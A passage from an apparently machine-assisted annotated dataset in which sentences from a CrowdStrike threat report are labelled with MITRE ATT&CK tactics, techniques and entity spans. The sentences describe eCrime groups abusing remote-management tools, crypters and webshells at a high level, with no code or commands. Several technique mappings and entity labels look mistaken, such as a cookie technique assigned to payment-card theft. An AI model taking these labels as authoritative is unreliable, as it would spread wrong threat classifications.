tactics to direct victims to download Inno Setup and ClickOnce installers for RMM tool ConnectWise ScreenConnect.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1608.004", "name": "Drive-by Target" } ], "procedure": "Direct victims to download malicious installers", "entities": [ { "text": "CHEF SPIDER", "start": 24, "end": 35, "label": "ThreatActor" }, { "text": "Inno Setup", "start": 115, "end": 125, "label": "MalwareTool" }, { "text": "ClickOnce ", "start": 130, "end": 140, "label": "MalwareTool" }, { "text": "RMM tool ConnectWise ScreenConnect", "start": 155, "end": 189, "label": "MalwareTool" }, { "text": "direct victims to download Inno Setup and ClickOnce installers", "start": 88, "end": 150, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p48-s416-9a69d0", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 48, "sentence_id": 416, "context_before": "Starting in March 2023, CHEF SPIDER adopted sophisticated social engineering tactics to direct victims to download Inno Setup and ClickOnce installers for RMM tool ConnectWise ScreenConnect.", "sentence_text": "In 2023, DISTANT SPIDER — which universally relies on ConnectWise ScreenConnect — continued deploying MSI installers (aka Windows Installers) for this legitimate RMM tool after exploiting vulnerable internet-facing servers within victim environments.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1584.004", "name": "Server" }, { "id": "T1036", "name": "Masquerading" } ], "procedure": "Deployed MSI installers", "entities": [ { "text": "DISTANT SPIDER", "start": 9, "end": 23, "label": "ThreatActor" }, { "text": "ConnectWise ScreenConnect", "start": 54, "end": 79, "label": "MalwareTool" }, { "text": "deploying MSI installers", "start": 92, "end": 116, "label": "Action" }, { "text": "exploiting vulnerable internet-facing servers", "start": 177, "end": 222, "label": "Action" }, { "text": "vulnerable internet-facing servers", "start": 188, "end": 222, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p48-s417-dc8396", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 48, "sentence_id": 417, "context_before": "In 2023, DISTANT SPIDER — which universally relies on ConnectWise ScreenConnect — continued deploying MSI installers (aka Windows Installers) for this legitimate RMM tool after exploiting vulnerable internet-facing servers within victim environments.", "sentence_text": "In September 2023, an earlier DISTANT SPIDER ConnectWise ScreenConnect intrusion likely enabled an ALPHA SPIDER affiliate to exfiltrate data and demand a ransom from a victim.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Exfiltrated data and ransomware", "entities": [ { "text": "DISTANT SPIDER", "start": 30, "end": 44, "label": "ThreatActor" }, { "text": "ConnectWise ScreenConnect", "start": 45, "end": 70, "label": "MalwareTool" }, { "text": "intrusion ", "start": 71, "end": 81, "label": "Action" }, { "text": " ALPHA SPIDER affiliate", "start": 98, "end": 121, "label": "ThreatActor" }, { "text": " exfiltrate data ", "start": 124, "end": 141, "label": "Action" }, { "text": "demand a ransom", "start": 145, "end": 160, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p48-s418-7d4d2b", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 48, "sentence_id": 418, "context_before": "In September 2023, an earlier DISTANT SPIDER ConnectWise ScreenConnect intrusion likely enabled an ALPHA SPIDER affiliate to exfiltrate data and demand a ransom from a victim.", "sentence_text": "In June 2023, SOLAR SPIDER likely used phishing emails to direct victims to download a ZIP archive hosted on GitHub.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "Used phishing emails to direct victims to download a ZIP archive", "entities": [ { "text": "SOLAR SPIDER", "start": 14, "end": 26, "label": "ThreatActor" }, { "text": "used phishing emails", "start": 34, "end": 54, "label": "Action" }, { "text": "direct victims to download a ZIP archive", "start": 58, "end": 98, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p48-s419-bf4ffe", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 48, "sentence_id": 419, "context_before": "In June 2023, SOLAR SPIDER likely used phishing emails to direct victims to download a ZIP archive hosted on GitHub.", "sentence_text": "This archive contained a loader that abuses DLL search-order hijacking to run the legitimate RMM Remote Management System tool.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "Abused DLL search-order to run RMM remote management system tool", "entities": [ { "text": "abuses DLL search-order hijacking", "start": 37, "end": 70, "label": "Action" }, { "text": "run the legitimate RMM", "start": 74, "end": 96, "label": "Action" }, { "text": "RMM Remote Management System tool", "start": 93, "end": 126, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p48-s420-ba6dbe", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 48, "sentence_id": 420, "context_before": "This archive contained a loader that abuses DLL search-order hijacking to run the legitimate RMM Remote Management System tool.", "sentence_text": "SOLAR SPIDER has used the legitimate RMM tool NetSupport Manager since at least October 2022.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "Uses the legitimate NetSupport Manager remote access tool.", "entities": [ { "text": "SOLAR SPIDER", "start": 0, "end": 12, "label": "ThreatActor" }, { "text": "used", "start": 17, "end": 21, "label": "Action" }, { "text": "NetSupport Manager", "start": 46, "end": 64, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p49-s421-745436", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 49, "sentence_id": 421, "context_before": "SOLAR SPIDER has used the legitimate RMM tool NetSupport Manager since at least October 2022.", "sentence_text": "Historical CARBON SPIDER Malware Distributed in Low-Volume Campaigns Throughout 2023, eCrime actors used numerous malware families previously exclusive to CARBON SPIDER (Figure 12).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p49-s422-639344", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 49, "sentence_id": 422, "context_before": "Historical CARBON SPIDER Malware Distributed in Low-Volume Campaigns Throughout 2023, eCrime actors used numerous malware families previously exclusive to CARBON SPIDER (Figure 12).", "sentence_text": "In contrast to typical MaaS operators, the low volume of campaigns using Goodsoft tooling likely indicates only a handful of customers were given access.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p49-s423-9b2702", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 49, "sentence_id": 423, "context_before": "In contrast to typical MaaS operators, the low volume of campaigns using Goodsoft tooling likely indicates only a handful of customers were given access.", "sentence_text": "LIZAR STAGER\nLizar Stager Nemesis Loader Demux Sekur NextGeneration Stager RAT Loader", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p50-s424-689a8b", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 50, "sentence_id": 424, "context_before": "LIZAR STAGER\nLizar Stager Nemesis Loader Demux Sekur NextGeneration Stager RAT Loader", "sentence_text": "Including previously identified BLIND SPIDER, four SPIDER adversaries now focus on LATAM targeting.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p50-s425-4efcbc", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 50, "sentence_id": 425, "context_before": "Including previously identified BLIND SPIDER, four SPIDER adversaries now focus on LATAM targeting.", "sentence_text": "SQUAB SPIDER\nORIGIN: UNKNOWN\nKEY\nTARGETED SECTORS\nFINANCIAL SERVICES\nRETAIL\nHOSPITALITY\nTECHNOLOGY\nTRAVEL\nAUTOMOTIVE\nENTERTAINMENT\nGOVERNMENT\nODYSSEY SPIDER\nBLIND SPIDER ORIGIN: BRAZIL MANUFACTURING ORIGIN:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p50-s426-ab170e", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 50, "sentence_id": 426, "context_before": "SQUAB SPIDER\nORIGIN: UNKNOWN\nKEY\nTARGETED SECTORS\nFINANCIAL SERVICES\nRETAIL\nHOSPITALITY\nTECHNOLOGY\nTRAVEL\nAUTOMOTIVE\nENTERTAINMENT\nGOVERNMENT\nODYSSEY SPIDER\nBLIND SPIDER ORIGIN: BRAZIL MANUFACTURING ORIGIN:", "sentence_text": "COLOMBIA REAL ESTATE TRANSPORTATION TARGETED", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p50-s427-40942e", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 50, "sentence_id": 427, "context_before": "COLOMBIA REAL ESTATE TRANSPORTATION TARGETED", "sentence_text": "BY:\nROBOT SPIDER\nORIGIN: BRAZIL\nSQUAB SPIDER\nODYSSEY SPIDER\nBLIND SPIDER\nUtilizes ROBOT SPIDER's Fsociety tooling", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p51-s428-17decb", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 51, "sentence_id": 428, "context_before": "BY:\nROBOT SPIDER\nORIGIN: BRAZIL\nSQUAB SPIDER\nODYSSEY SPIDER\nBLIND SPIDER\nUtilizes ROBOT SPIDER's Fsociety tooling", "sentence_text": "AVIATOR SPIDER, BLIND SPIDER and ODYSSEY SPIDER all used ROBOT SPIDER’s Fsociety crypter service during 2023.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.002", "name": "Tool" } ], "procedure": "Used Fsociety crypter service", "entities": [ { "text": "AVIATOR SPIDER", "start": 0, "end": 14, "label": "ThreatActor" }, { "text": "BLIND SPIDER", "start": 16, "end": 28, "label": "ThreatActor" }, { "text": "ODYSSEY SPIDER", "start": 33, "end": 47, "label": "ThreatActor" }, { "text": " ROBOT SPIDER", "start": 56, "end": 69, "label": "ThreatActor" }, { "text": "Fsociety crypter service", "start": 72, "end": 96, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p51-s429-c9dff6", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 51, "sentence_id": 429, "context_before": "AVIATOR SPIDER, BLIND SPIDER and ODYSSEY SPIDER all used ROBOT SPIDER’s Fsociety crypter service during 2023.", "sentence_text": "Fsociety tools typically consist of a set of scripts that download and execute an intermediate .NET payload that subsequently loads a final RAT payload in memory.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1620", "name": "Reflective Code Loading" }, { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Download and execute an intermediate .NET payload", "entities": [ { "text": "Fsociety tools", "start": 0, "end": 14, "label": "MalwareTool" }, { "text": "download and execute an intermediate .NET payload", "start": 58, "end": 107, "label": "Action" }, { "text": "loads a final RAT payload in memory", "start": 126, "end": 161, "label": "Action" }, { "text": "memory", "start": 155, "end": 161, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p51-s430-58888a", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 51, "sentence_id": 430, "context_before": "Fsociety tools typically consist of a set of scripts that download and execute an intermediate .NET payload that subsequently loads a final RAT payload in memory.", "sentence_text": "Throughout 2023, ROBOT SPIDER continued to update the Fsociety crypter to improve obfuscation and add capabilities.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1587.001", "name": "Develop Capabilities: Malware" }, { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Update the Fsociety crypter to improve obfuscation and add capabilities.", "entities": [ { "text": "ROBOT SPIDER", "start": 17, "end": 29, "label": "ThreatActor" }, { "text": "update the Fsociety crypter", "start": 43, "end": 70, "label": "Action" }, { "text": "Fsociety crypter", "start": 54, "end": 70, "label": "MalwareTool" }, { "text": "improve obfuscation", "start": 74, "end": 93, "label": "Action" }, { "text": "add capabilities", "start": 98, "end": 114, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p51-s431-a173f6", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 51, "sentence_id": 431, "context_before": "Throughout 2023, ROBOT SPIDER continued to update the Fsociety crypter to improve obfuscation and add capabilities.", "sentence_text": "ODYSSEY SPIDER predominantly focuses on the travel and hospitality sectors in LATAM and Southeastern Europe, specifically aiming to monetize payment card details entered during travel-related booking processes.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1506", "name": "Web Session Cookie" }, { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Target the travel and hospitality sectors to monetize payment card details entered during travel-related booking processes.", "entities": [ { "text": "ODYSSEY SPIDER", "start": 0, "end": 14, "label": "ThreatActor" }, { "text": "focuses on the travel and hospitality sectors", "start": 29, "end": 74, "label": "Action" }, { "text": "monetize payment card details", "start": 132, "end": 161, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p51-s432-bceb9a", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 51, "sentence_id": 432, "context_before": "ODYSSEY SPIDER predominantly focuses on the travel and hospitality sectors in LATAM and Southeastern Europe, specifically aiming to monetize payment card details entered during travel-related booking processes.", "sentence_text": "SQUAB SPIDER primarily targets financial institutions, particularly but not exclusively those based in Mexico.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p51-s433-7b1a4d", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 51, "sentence_id": 433, "context_before": "SQUAB SPIDER primarily targets financial institutions, particularly but not exclusively those based in Mexico.", "sentence_text": "The adversary achieves initial access by exploiting web servers to deploy a wide set of webshells.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" }, { "id": "T1190", "name": "Exploit Public-Facing Application" }, { "id": "T1584.006", "name": "Web Services" } ], "procedure": "Exploit web servers to deploy a set of webshells", "entities": [ { "text": "exploiting web servers", "start": 41, "end": 63, "label": "Action" }, { "text": "deploy a wide set of webshells", "start": 67, "end": 97, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p51-s434-063e0a", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 51, "sentence_id": 434, "context_before": "The adversary achieves initial access by exploiting web servers to deploy a wide set of webshells.", "sentence_text": "From there, threat actors rely on passive BLUEAGAVE bind shells or simple listeners to enable lateral movement through a network and to generally avoid conventional C2 traffic.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1021", "name": "Remote Services" } ], "procedure": "Threat actors use passive BLUEAGAVE bind shells or listeners to move laterally across the network while avoiding conventional command-and-control traffic.", "entities": [ { "text": "threat actors", "start": 12, "end": 25, "label": "ThreatActor" }, { "text": "rely on passive BLUEAGAVE bind shells", "start": 26, "end": 63, "label": "Action" }, { "text": "rely on passive BLUEAGAVE bind shells or simple listeners", "start": 26, "end": 83, "label": "Action" }, { "text": "enable lateral movement", "start": 87, "end": 110, "label": "Action" }, { "text": "avoid conventional C2 traffic", "start": 146, "end": 175, "label": "Action" }, { "text": "BLUEAGAVE", "start": 42, "end": 51, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p51-s435-9803cc", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 51, "sentence_id": 435, "context_before": "From there, threat actors rely on passive BLUEAGAVE bind shells or simple listeners to enable lateral movement through a network and to generally avoid conventional C2 traffic.", "sentence_text": "SQUAB SPIDER likely attempts to steal transaction-related data from victims.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "The threat actor SQUAB SPIDER attempts to steal transaction-related data from victims.", "entities": [ { "text": "SQUAB SPIDER", "start": 0, "end": 12, "label": "ThreatActor" }, { "text": "attempts to steal transaction-related data", "start": 20, "end": 62, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p51-s436-f17fa1", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 51, "sentence_id": 436, "context_before": "SQUAB SPIDER likely attempts to steal transaction-related data from victims.", "sentence_text": "Outlook\nThough opportunistic BGH campaigns remain the primary eCrime threat across all sectors, a smaller eCrime actor subset will likely continue targeted eCrime campaigns seeking to steal payment card- or transaction-related data from victims.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p51-s437-eea077", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 51, "sentence_id": 437, "context_before": "Outlook\nThough opportunistic BGH campaigns remain the primary eCrime threat across all sectors, a smaller eCrime actor subset will likely continue targeted eCrime campaigns seeking to steal payment card- or transaction-related data from victims.", "sentence_text": "As with the BGH ecosystem, legitimate RMM tools will likely remain popular among targeted eCrime operations due to their widespread use within normal business processes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p52-s438-e6b57b", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 52, "sentence_id": 438, "context_before": "As with the BGH ecosystem, legitimate RMM tools will likely remain popular among targeted eCrime operations due to their widespread use within normal business processes.", "sentence_text": "eCrime remained a 2023 threat landscape cornerstone, with BGH adversaries SCATTERED SPIDER and GRACEFUL SPIDER accounting for most activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p52-s439-379295", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 52, "sentence_id": 439, "context_before": "eCrime remained a 2023 threat landscape cornerstone, with BGH adversaries SCATTERED SPIDER and GRACEFUL SPIDER accounting for most activity.", "sentence_text": "the eCrime landscape in 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p52-s440-764a09", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 52, "sentence_id": 440, "context_before": "the eCrime landscape in 2024.", "sentence_text": "This assessment is made with high confidence based on the continued success of these operations, as observed in the 76% growth in DLS posts in 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p52-s441-c49419", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 52, "sentence_id": 441, "context_before": "This assessment is made with high confidence based on the continued success of these operations, as observed in the 76% growth in DLS posts in 2023.", "sentence_text": "Trends likely to be observed in 2024 in support of BGH operations include ransomware-free data leak operations and an increase in cloud-conscious operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p52-s442-183dea", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 52, "sentence_id": 442, "context_before": "Trends likely to be observed in 2024 in support of BGH operations include ransomware-free data leak operations and an increase in cloud-conscious operations.", "sentence_text": "They will use this information in ongoing operations and ransom negotiations or simply sell it to other eCrime adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p52-s443-c47f03", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 52, "sentence_id": 443, "context_before": "They will use this information in ongoing operations and ransom negotiations or simply sell it to other eCrime adversaries.", "sentence_text": "Financially motivated adversaries also increasingly realized the benefits of dedicated relationships in 2023 and were likely able to increase resulting operational success rates.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p52-s444-f78ab1", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 52, "sentence_id": 444, "context_before": "Financially motivated adversaries also increasingly realized the benefits of dedicated relationships in 2023 and were likely able to increase resulting operational success rates.", "sentence_text": "Access brokers and RaaS actors will likely continue to forge dedicated relationships in 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p52-s445-2f3bdc", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 52, "sentence_id": 445, "context_before": "Access brokers and RaaS actors will likely continue to forge dedicated relationships in 2024.", "sentence_text": "The coming year will also likely include enhancements in social engineering effectiveness, MFA bypass and third-party provider targeting in efforts to leverage a single larger point of access.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1649", "name": "Steal or Forge Authentication Certificates" } ], "procedure": "MFA bypass and third-party provider targeting to leverage a single point of access", "entities": [ { "text": "MFA bypass", "start": 91, "end": 101, "label": "Action" }, { "text": "third-party provider targeting", "start": 106, "end": 136, "label": "Action" }, { "text": "leverage a single larger point of access", "start": 151, "end": 191, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p53-s446-c60478", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 53, "sentence_id": 446, "context_before": "The coming year will also likely include enhancements in social engineering effectiveness, MFA bypass and third-party provider targeting in efforts to leverage a single larger point of access.", "sentence_text": "High-profile geopolitical conflicts — namely the Russia-Ukraine and Israel-Hamas conflicts — generated significant targeted intrusion and hacktivist cyber activity in 2023, particularly for Iran-nexus and Russia-nexus adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p53-s447-3b12b0", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 53, "sentence_id": 447, "context_before": "High-profile geopolitical conflicts — namely the Russia-Ukraine and Israel-Hamas conflicts — generated significant targeted intrusion and hacktivist cyber activity in 2023, particularly for Iran-nexus and Russia-nexus adversaries.", "sentence_text": "In 2024, these and other high-profile conflicts will remain as significant hacktivism drivers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p53-s448-7b4ab5", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 53, "sentence_id": 448, "context_before": "In 2024, these and other high-profile conflicts will remain as significant hacktivism drivers.", "sentence_text": "Russia-nexus adversaries also persisted in their targeting of Ukraine, NATO members and partner countries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p53-s449-e2e399", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 53, "sentence_id": 449, "context_before": "Russia-nexus adversaries also persisted in their targeting of Ukraine, NATO members and partner countries.", "sentence_text": "They will almost certainly continue to conduct intelligence collection operations and IO in these geographies in 2024.\nin 2023, including the first-ever Egypt-nexus adversary, WATCHFUL SPHINX.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p53-s450-beace8", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 53, "sentence_id": 450, "context_before": "They will almost certainly continue to conduct intelligence collection operations and IO in these geographies in 2024.\nin 2023, including the first-ever Egypt-nexus adversary, WATCHFUL SPHINX.", "sentence_text": "Consistent with previous assessments, CrowdStrike CAO expects the majority of established adversaries and activity clusters to continue to expand or update their capabilities in 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p53-s451-7a2711", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 53, "sentence_id": 451, "context_before": "Consistent with previous assessments, CrowdStrike CAO expects the majority of established adversaries and activity clusters to continue to expand or update their capabilities in 2024.", "sentence_text": "Fewer adversaries and activity clusters around the world are likely to expand their assessed target scope; rather, they will likely continue to focus on historical and predominantly regional target sets.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p53-s452-020339", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 53, "sentence_id": 452, "context_before": "Fewer adversaries and activity clusters around the world are likely to expand their assessed target scope; rather, they will likely continue to focus on historical and predominantly regional target sets.", "sentence_text": "eCrime threat actors remained the primary threat to most mobile users in 2023 and will likely continue as such in 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p53-s453-9aa09b", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 53, "sentence_id": 453, "context_before": "eCrime threat actors remained the primary threat to most mobile users in 2023 and will likely continue as such in 2024.", "sentence_text": "Targeted intrusion actors will also almost certainly continue to target mobile devices, with increases in platform and device security causing less sophisticated adversaries to struggle to operate successfully in that space.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p53-s454-6d4cf7", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 53, "sentence_id": 454, "context_before": "Targeted intrusion actors will also almost certainly continue to target mobile devices, with increases in platform and device security causing less sophisticated adversaries to struggle to operate successfully in that space.", "sentence_text": "With the creation of Counter Adversary Operations, CrowdStrike remains steadfast in its mission to stop breaches.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p53-s455-12dcdd", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 53, "sentence_id": 455, "context_before": "With the creation of Counter Adversary Operations, CrowdStrike remains steadfast in its mission to stop breaches.", "sentence_text": "continue to deliver unparalleled threat intelligence in 2024 and beyond.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p54-s456-8ff841", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 54, "sentence_id": 456, "context_before": "continue to deliver unparalleled threat intelligence in 2024 and beyond.", "sentence_text": "Recommendations\nMake identity protection a must-have Due to high success rates, identity-based and social engineering attacks surged in 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p54-s457-613d2e", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 54, "sentence_id": 457, "context_before": "Recommendations\nMake identity protection a must-have Due to high success rates, identity-based and social engineering attacks surged in 2023.", "sentence_text": "Stolen credentials grant adversaries swift access and control — an instant gateway to a breach.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p54-s458-344761", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 54, "sentence_id": 458, "context_before": "Stolen credentials grant adversaries swift access and control — an instant gateway to a breach.", "sentence_text": "To counter these threats, it is essential to implement phishing-resistant multifactor1 authentication and extend it to legacy systems and protocols, educate teams on social engineering and implement technology that can detect and correlate threats across identity, endpoint and cloud environments.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p54-s459-5f8469", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 54, "sentence_id": 459, "context_before": "To counter these threats, it is essential to implement phishing-resistant multifactor1 authentication and extend it to legacy systems and protocols, educate teams on social engineering and implement technology that can detect and correlate threats across identity, endpoint and cloud environments.", "sentence_text": "Cross-domain visibility and enforcement enables security teams to detect lateral movement, get full attack path visibility and hunt for malicious use of legitimate tools.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p54-s460-9df95a", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 54, "sentence_id": 460, "context_before": "Cross-domain visibility and enforcement enables security teams to detect lateral movement, get full attack path visibility and hunt for malicious use of legitimate tools.", "sentence_text": "Prioritize cloud-native application protection platforms (CNAPPs)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p54-s461-86e5bb", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 54, "sentence_id": 461, "context_before": "Prioritize cloud-native application protection platforms (CNAPPs)", "sentence_text": "Cloud adoption is exploding as companies realize the potential for innovation and business agility that the cloud offers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p54-s462-9b687d", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 54, "sentence_id": 462, "context_before": "Cloud adoption is exploding as companies realize the potential for innovation and business agility that the cloud offers.", "sentence_text": "Due to this growth, the cloud is rapidly becoming a2 major battleground for cyberattacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p54-s463-edafa2", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 54, "sentence_id": 463, "context_before": "Due to this growth, the cloud is rapidly becoming a2 major battleground for cyberattacks.", 